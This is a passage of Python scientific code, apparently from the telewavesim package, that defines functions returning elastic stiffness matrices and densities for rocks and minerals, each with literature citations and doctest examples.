C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 66.32; C[3,4] = -0.27; C[3,5] = 0.73
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.77; C[4,5] = -0.02
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 70.75
return C, rho
def eclogite_massive():
"""
Elastic constants of Massive Eclogite rock (GPa) from
Cao et al. (2013), in Voigt notation
- Abbreviation: ``'EC_m'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3490 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.eclogite_massive()[0]
array([[ 2.3885e+02, 8.2010e+01, 8.1440e+01, 3.0000e-01, -2.0000e-02,
5.0000e-01],
[ 8.2010e+01, 2.4212e+02, 8.1110e+01, -6.6000e-01, 3.3000e-01,
1.2000e-01],
[ 8.1440e+01, 8.1110e+01, 2.3557e+02, -2.8000e-01, 2.2000e-01,
3.1000e-01],
[ 3.0000e-01, -6.6000e-01, -2.8000e-01, 7.8720e+01, 2.7000e-01,
0.0000e+00],
[-2.0000e-02, 3.3000e-01, 2.2000e-01, 2.7000e-01, 7.8370e+01,
2.5000e-01],
[ 5.0000e-01, 1.2000e-01, 3.1000e-01, 0.0000e+00, 2.5000e-01,
7.7910e+01]])
>>> elast.eclogite_massive()[1]
3490.0
"""
rho = 3490.
C = np.zeros((6,6), dtype=float)
C[0,0] = 238.85; C[0,1] = 82.01; C[0,2] = 81.44; C[0,3] = 0.3; C[0,4] = -0.02; C[0,5] = 0.5
C[1,0] = C[0,1]; C[1,1] = 242.12; C[1,2] = 81.11; C[1,3] = -0.66; C[1,4] = 0.33; C[1,5] = 0.12
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 235.57; C[2,3] = -0.28; C[2,4] = 0.22; C[2,5] = 0.31
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 78.72; C[3,4] = 0.27; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 78.37; C[4,5] = 0.25
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 77.91
return C, rho
def epidote():
"""
Elastic constants of epidote mineral (GPa) from
Aleksandrov et al. (1974), in Voigt notation
- Abbreviation: ``'ep'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3465 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.epidote()[0]
array([[211.5, 65.6, 43.2, 0. , -6.5, 0. ],
[ 65.6, 239. , 43.6, 0. , -10.4, 0. ],
[ 43.2, 43.6, 202.1, 0. , -20. , 0. ],
[ 0. , 0. , 0. , 39.1, 0. , -2.3],
[ -6.5, -10.4, -20. , 0. , 43.4, 0. ],
[ 0. , 0. , 0. , -2.3, 0. , 79.5]])
>>> elast.epidote()[1]
3465.0
"""
rho = 3465.
C = np.zeros((6,6), dtype=float)
C[0,0] = 211.5; C[0,1] = 65.6; C[0,2] = 43.2; C[0,3] = 0.; C[0,4] = -6.5; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 239.; C[1,2] = 43.6; C[1,3] = 0.; C[1,4] = -10.4; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 202.1; C[2,3] = 0.; C[2,4] = -20.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 39.1; C[3,4] = 0.; C[3,5] = -2.3
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 43.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 79.5
return C, rho
def garnet():
"""
Elastic constants of garnet mineral (GPa) from
Babuska et al. (1978), in Voigt notation
- Abbreviation: ``'grt'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3660 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.garnet()[0]
array([[306.2, 112.5, 112.5, 0. , 0. , 0. ],
[112.5, 306.2, 112.5, 0. , 0. , 0. ],
[112.5, 112.5, 306.2, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 92.7, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 92.7, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 92.7]])
>>> elast.garnet()[1]
3660.0
"""
rho = 3660.
C = np.zeros((6,6), dtype=float)
C[0,0] = 306.2; C[0,1] = 112.5; C[0,2] = 112.5; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 306.2; C[1,2] = 112.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 306.2; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 92.7; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 92.7; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 92.7
return C, rho
def glaucophane():
"""
Elastic constants of glaucophane mineral (GPa) from
Bezacier et al. (2010), in Voigt notation
- Abbreviation: ``'gln'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3070 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.glaucophane()[0]
array([[122.3 , 45.7 , 37.2 , 0. , 2.3 , 0. ],
[ 45.7 , 231.5 , 74.9 , 0. , -4.8 , 0. ],
[ 37.2 , 74.9 , 254.6 , 0. , -2.37, 0. ],
[ 0. , 0. , 0. , 79.6 , 0. , 8.9 ],
[ 2.3 , -4.8 , -2.37, 0. , 52.8 , 0. ],
[ 0. , 0. , 0. , 8.9 , 0. , 51.2 ]])
>>> elast.glaucophane()[1]
3070.0
"""
rho = 3070.
C = np.zeros((6,6), dtype=float)
C[0,0] = 122.3; C[0,1] = 45.7; C[0,2] = 37.2; C[0,3] = 0.; C[0,4] = 2.3; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 231.5; C[1,2] = 74.9; C[1,3] = 0.; C[1,4] = -4.8; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 254.6; C[2,3] = 0.; C[2,4] = -2.37; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 79.6; C[3,4] = 0.; C[3,5] = 8.9
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 52.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 51.2
return C, rho
def harzburgite():
"""
Elastic constants of harzburgite rock (GPa) from
Covey-Crump et al. (2003), in Voigt notation
- Abbreviation: ``'HB'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3200 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.harzburgite()[0]
array([[226.5 , 75.34, 74.73, -0.27, -2. , 1.85],
[ 75.34, 242.8 , 73.68, -3.6 , -1.91, 4.14],
[ 74.73, 73.68, 230. , -4.36, -4.27, -0.27],
[ -0.27, -3.6 , -4.36, 80.75, 1.81, -2.19],
[ -2. , -1.91, -4.27, 1.81, 76.94, -1.88],
[ 1.85, 4.14, -0.27, -2.19, -1.88, 79.15]])
>>> elast.harzburgite()[1]
3200.0
"""
rho = 3200.
C = np.zeros((6,6), dtype=float)
C[0,0] = 226.5; C[0,1] = 75.34; C[0,2] = 74.73; C[0,3] = -0.27; C[0,4] = -2.00; C[0,5] = 1.85
C[1,0] = C[0,1]; C[1,1] = 242.8; C[1,2] = 73.68; C[1,3] = -3.6; C[1,4] = -1.91; C[1,5] = 4.14
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 230.; C[2,3] = -4.36; C[2,4] = -4.27; C[2,5] = -0.27
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 80.75; C[3,4] = 1.81; C[3,5] = -2.19
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 76.94; C[4,5] = -1.88
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 79.15
return C, rho
def hornblende():
"""
Elastic constants of hornblende mineral (GPa) from
Aleksandrov and Ryzhova (1986), in Voigt notation
- Abbreviation: ``'hbl'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3200 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.hornblende()[0]
array([[116. , 49.9, 61.4, 0. , 4.3, 0. ],
[ 49.9, 159.7, 65.5, 0. , -2.5, 0. ],
[ 61.4, 65.5, 191.6, 0. , 10. , 0. ],
[ 0. , 0. , 0. , 57.4, 0. , -6.2],
[ 4.3, -2.5, 10. , 0. , 31.8, 0. ],
[ 0. , 0. , 0. , -6.2, 0. , 36.8]])
>>> elast.hornblende()[1]
3200.0
"""
rho = 3200.
C = np.zeros((6,6), dtype=float)
C[0,0] = 116.; C[0,1] = 49.9; C[0,2] = 61.4; C[0,3] = 0.; C[0,4] = 4.3; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 159.7; C[1,2] = 65.5; C[1,3] = 0.; C[1,4] = -2.5; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 191.6; C[2,3] = 0.; C[2,4] = 10.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 57.4; C[3,4] = 0.; C[3,5] = -6.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.8; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 36.8
return C, rho
def jadeite():
"""
Elastic constants of jadeite mineral (GPa) from
Kandelin and Weiner (1988), in Voigt notation
- Abbreviation: ``'jade'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3330 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.jadeite()[0]
array([[274., 94., 71., 0., 4., 0.],
[ 94., 253., 82., 0., 14., 0.],
[ 71., 82., 282., 0., 28., 0.],
[ 0., 0., 0., 88., 0., 13.],
[ 4., 14., 28., 0., 65., 0.],
[ 0., 0., 0., 13., 0., 94.]])
>>> elast.jadeite()[1]
3330.0
"""
rho = 3330.
C = np.zeros((6,6), dtype=float)
C[0,0] = 274.; C[0,1] = 94.; C[0,2] = 71.; C[0,3] = 0.; C[0,4] = 4.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 253.; C[1,2] = 82.; C[1,3] = 0.; C[1,4] = 14.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 282.; C[2,3] = 0.; C[2,4] = 28.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 88.; C[3,4] = 0.; C[3,5] = 13.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 94.
return C, rho
def lawsonite():
"""
Elastic constants of lawsonite mineral (GPa) from
Kandelin and Weiner (1988), in Voigt notation
- Abbreviation: ``'lws'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3090 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lawsonite()[0]
array([[214., 69., 82., 0., 0., 0.],
[ 69., 226., 65., 0., 0., 0.],
[ 82., 65., 259., 0., 0., 0.],
[ 0., 0., 0., 60., 0., 0.],
[ 0., 0., 0., 0., 65., 0.],
[ 0., 0., 0., 0., 0., 17.]])
>>> elast.lawsonite()[1]
3090.0
"""
rho = 3090.
C = np.zeros((6,6), dtype=float)
C[0,0] = 214.; C[0,1] = 69.; C[0,2] = 82.; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 226.; C[1,2] = 65.; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 259.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 60.; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 65.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 17.
return C, rho
def lherzolite():
"""
Elastic constants of lherzolite rock (GPa) from
Peselnick et al. (1974), in Voigt notation
- Abbreviation: ``'LHZ'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3270 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lherzolite()[0]
array([[ 1.8740e+02, 6.3710e+01, 6.3870e+01, 7.8000e-01, 2.0200e+00,
-3.2000e+00],
[ 6.3710e+01, 2.1125e+02, 6.4500e+01, -3.0700e+00, 8.7000e-01,
-5.7800e+00],
[ 6.3870e+01, 6.4500e+01, 1.9000e+02, 3.8000e-01, 2.3800e+00,
-1.2000e-01],
[ 7.8000e-01, -3.0700e+00, 3.8000e-01, 6.7900e+01, -2.1200e+00,
1.6000e+00],
[ 2.0200e+00, 8.7000e-01, 2.3800e+00, -2.1200e+00, 6.3120e+01,
-5.5000e-01],
[-3.2000e+00, -5.7800e+00, -1.2000e-01, 1.6000e+00, -5.5000e-01,
6.6830e+01]])
>>> elast.lherzolite()[1]
3270.0
"""
rho = 3270.
C = np.zeros((6,6), dtype=float)
C[0,0] = 187.4; C[0,1] = 63.71; C[0,2] = 63.87; C[0,3] = 0.78; C[0,4] = 2.02; C[0,5] = -3.2
C[1,0] = C[0,1]; C[1,1] = 211.25; C[1,2] = 64.5; C[1,3] = -3.07; C[1,4] = 0.87; C[1,5] = -5.78
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 190.; C[2,3] = 0.38; C[2,4] = 2.38; C[2,5] = -0.12
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 67.9; C[3,4] = -2.12; C[3,5] = 1.6
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 63.12; C[4,5] = -0.55
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 66.83
return C, rho
def lizardite_atom():
"""
Elastic constants of lizardite mineral (GPa) from
Auzende et al., Phys. Chem. Min. 2006 from atomistic calculations.
- Abbreviation: ``None``: Not currently used.
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2515 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lizardite_atom()[0]
array([[ 2.29080e+02, 8.90440e+01, 1.35580e+01, -1.00000e-04,
4.60250e+00, 1.00000e-04],
[ 8.90440e+01, 2.29080e+02, 1.35570e+01, -1.00000e-04,
-4.60160e+00, 1.00000e-04],
[ 1.35580e+01, 1.35570e+01, 4.58380e+01, -1.00000e-04,
1.50000e-03, 1.00000e-04],
[-1.00000e-04, -1.00000e-04, -1.00000e-04, 1.27650e+01,
-1.00000e-04, -4.45980e+00],
[ 4.60250e+00, -4.60160e+00, 1.50000e-03, -1.00000e-04,
1.27740e+01, 1.00000e-04],
[ 1.00000e-04, 1.00000e-04, 1.00000e-04, -4.45980e+00,
1.00000e-04, 7.00166e+01]])
>>> elast.lizardite_atom()[1]
2515.5
"""
rho = 2515.5
C = np.zeros((6,6), dtype=float)
C[0,0] = 229.08; C[0,1] = 89.044; C[0,2] = 13.558; C[0,3] = -0.0001; C[0,4] = 4.6025; C[0,5] = 0.0001
C[1,0] = C[0,1]; C[1,1] = 229.08; C[1,2] = 13.557; C[1,3] = -0.0001; C[1,4] = -4.6016; C[1,5] = 0.0001
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 45.838; C[2,3] = -0.0001; C[2,4] = 0.0015; C[2,5] = 0.0001
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 12.765; C[3,4] = -0.0001; C[3,5] = -4.4598
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 12.774; C[4,5] = 0.0001
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 70.0166
return C, rho
def lizardite():
"""
Elastic constants of lizardite mineral (GPa) from
Reynard, GRL, 2007 from Density Functional Theory.
- Abbreviation: ``'lz'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2610 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.lizardite()[0]
array([[245. , 50. , 31. , 0. , 0. , 0. ],
[ 50. , 245. , 31. , 0. , 0. , 0. ],
[ 31. , 31. , 23. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 11.6, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 11.6, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 97.5]])
>>> elast.lizardite()[1]
2610.0
"""
rho = 2610.
C = np.zeros((6,6), dtype=float)
C[0,0] = 245.; C[0,1] = 50.; C[0,2] = 31.; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 245.; C[1,2] = 31.; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 23.; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 11.6; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 11.6; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 97.5
return C, rho
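The lizardite constants above are strongly anisotropic (C33 = 23 GPa versus C11 = 245 GPa), which translates directly into direction-dependent P-wave speeds. As an illustration (this helper is not part of telewavesim), the axis-aligned P-wave speeds follow from the diagonal stiffnesses via Vp_i = sqrt(C_ii / rho):

```python
import numpy as np

def axis_vp(C, rho):
    """Illustrative helper: P-wave speeds (km/s) along the three
    coordinate axes, Vp_i = sqrt(C_ii / rho), with C in GPa and
    rho in kg/m^3."""
    diag = np.array([C[0, 0], C[1, 1], C[2, 2]])
    # GPa -> Pa (factor 1e9), then m/s -> km/s (factor 1e-3)
    return np.sqrt(diag * 1.0e9 / rho) / 1.0e3
```

For lizardite this gives roughly 9.7 km/s in the basal plane but only about 3.0 km/s along the symmetry axis.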
def muscovite():
"""
Elastic constants of muscovite mineral (GPa) from
Vaughan and Guggenheim (1986), in Voigt notation
- Abbreviation: ``'ms'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2834 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.muscovite()[0]
array([[181. , 48.8, 25.6, 0. , -14.2, 0. ],
[ 48.8, 178.4, 21.2, 0. , 1.1, 0. ],
[ 25.6, 21.2, 58.6, 0. , 1. , 0. ],
[ 0. , 0. , 0. , 16.5, 0. , -5.2],
[-14.2, 1.1, 1. , 0. , 19.5, 0. ],
[ 0. , 0. , 0. , -5.2, 0. , 72. ]])
>>> elast.muscovite()[1]
2834.0
"""
rho = 2834.
C = np.zeros((6,6), dtype=float)
C[0,0] = 181.; C[0,1] = 48.8; C[0,2] = 25.6; C[0,3] = 0.; C[0,4] = -14.2; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 178.4; C[1,2] = 21.2; C[1,3] = 0.; C[1,4] = 1.1; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 58.6; C[2,3] = 0.; C[2,4] = 1.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 16.5; C[3,4] = 0.; C[3,5] = -5.2
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 19.5; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 72.
return C, rho
def olivine():
"""
Elastic constants of olivine mineral (GPa) from
Abramson et al. (1997), in Voigt notation
- Abbreviation: ``'ol'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3355 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.olivine()[0]
array([[320.5 , 68.15, 71.6 , 0. , 0. , 0. ],
[ 68.15, 196.5 , 76.8 , 0. , 0. , 0. ],
[ 71.6 , 76.8 , 233.5 , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 64. , 0. , 0. ],
[ 0. , 0. , 0. , 0. , 77. , 0. ],
[ 0. , 0. , 0. , 0. , 0. , 78.7 ]])
>>> elast.olivine()[1]
3355.0
"""
rho = 3355.
C = np.zeros((6,6), dtype=float)
C[0,0] = 320.5; C[0,1] = 68.15; C[0,2] = 71.6; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 196.5; C[1,2] = 76.8; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 233.5; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 64.; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 77.; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 78.7
return C, rho
def orthopyroxene():
"""
Elastic constants of orthopyroxene mineral (GPa) from
Chai et al. (1997), in Voigt notation
- Abbreviation: ``'opx'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (3304 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.orthopyroxene()[0]
array([[236.9, 79.6, 63.2, 0. , 0. , 0. ],
[ 79.6, 180.5, 56.8, 0. , 0. , 0. ],
[ 63.2, 56.8, 230.4, 0. , 0. , 0. ],
[ 0. , 0. , 0. , 84.3, 0. , 0. ],
[ 0. , 0. , 0. , 0. , 79.4, 0. ],
[ 0. , 0. , 0. , 0. , 0. , 80.1]])
>>> elast.orthopyroxene()[1]
3304.0
"""
rho = 3304.
C = np.zeros((6,6), dtype=float)
C[0,0] = 236.9; C[0,1] = 79.6; C[0,2] = 63.2; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 180.5; C[1,2] = 56.8; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 230.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 84.3; C[3,4] = 0.; C[3,5] = 0.
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 79.4; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 80.1
return C, rho
def plagioclase_64():
"""
Elastic constants of plagioclase mineral (GPa) from
Ryzhova (1964), in Voigt notation
- Abbreviation: ``None``: Not currently used.
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2700 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.plagioclase_64()[0]
array([[ 81.8, 39.3, 40.7, 0. , -9. , 0. ],
[ 39.3, 145. , 34.1, 0. , -7.9, 0. ],
[ 40.7, 34.1, 133. , 0. , -18.5, 0. ],
[ 0. , 0. , 0. , 17.7, 0. , -0.8],
[ -9. , -7.9, -18.5, 0. , 31.2, 0. ],
[ 0. , 0. , 0. , -0.8, 0. , 33.3]])
>>> elast.plagioclase_64()[1]
2700.0
"""
rho = 2700.
C = np.zeros((6,6), dtype=float)
C[0,0] = 81.8; C[0,1] = 39.3; C[0,2] = 40.7; C[0,3] = 0.; C[0,4] = -9.; C[0,5] = 0.
C[1,0] = C[0,1]; C[1,1] = 145.; C[1,2] = 34.1; C[1,3] = 0.; C[1,4] = -7.9; C[1,5] = 0.
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 133.; C[2,3] = 0.; C[2,4] = -18.5; C[2,5] = 0.
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 17.7; C[3,4] = 0.; C[3,5] = -0.8
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.2; C[4,5] = 0.
C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 33.3
return C, rho
def plagioclase_06():
"""
Elastic constants of plagioclase mineral (GPa) from
Brown et al. (2006), in Voigt notation
- Abbreviation: ``'plag'``
Returns:
(tuple): tuple containing:
* C (np.ndarray): Elastic stiffness matrix (shape ``(6, 6)``)
* rho (float): Density (2700 kg/m^3)
Example
-------
>>> from telewavesim import elast
>>> elast.plagioclase_06()[0]
array([[ 69.9 , 33.24 , 31.56 , 5.28 , -2.46 , -0.72 ],
[ 33.24 , 183.28 , 7.53 , 5.31 , -7.6 , -0.423],
[ 31.56 , 7.53 , 175.65 , -17.48 , 5.86 , -11.29 ],
[ 5.28 , 5.31 , -17.48 , 26.93 , -3.94 , -6.56 ],
[ -2.46 , -7.6 , 5.86 , -3.94 , 26.91 , 0.98 ],
[ -0.72 , -0.423, -11.29 , -6.56 , 0.98 , 33.39 ]])
>>> elast.plagioclase_06()[1]
2700.0
"""
rho = 2700.
C = np.zeros((6,6), dtype=float)
C[0,0] = 69.9; C[0,1] = 33.24; C[0,2] = 31.56; C[0,3] = 5.28; C[0,4] = -2.46; C[0,5] = -0.72
C[1,0] = C[0,1]; C[1,1] = 183.28; C[1,2] = 7.53; C[1,3] = 5.31; C[1,4] = -7.6; C[1,5] = -0.423
C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 175.65; C[2,3] = -17.48; C[2,4] = 5.86; C[2,5] = -11.29
C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 26.93; C[3,4] = -3.94; C[3,5] = -6.56
C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 26.91; C[4,5] = 0.98
